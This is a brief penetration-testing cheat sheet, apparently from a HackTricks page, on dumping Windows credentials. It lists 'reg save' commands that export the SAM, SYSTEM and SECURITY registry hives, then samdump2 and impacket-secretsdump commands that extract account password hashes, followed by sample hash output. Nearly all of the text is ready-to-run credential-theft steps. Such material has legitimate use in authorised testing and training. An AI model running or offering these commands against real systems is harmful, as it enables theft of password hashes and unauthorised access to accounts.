Registry Dump

Below we will show how we can dump credentials using the registry.

---

Registry Dump

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

After retrieving the registry hives we can extract the hashes with below commands:

samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Below we find a example output for samdump2:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

---

Page not found - HackTricksbook.hacktricks.xyz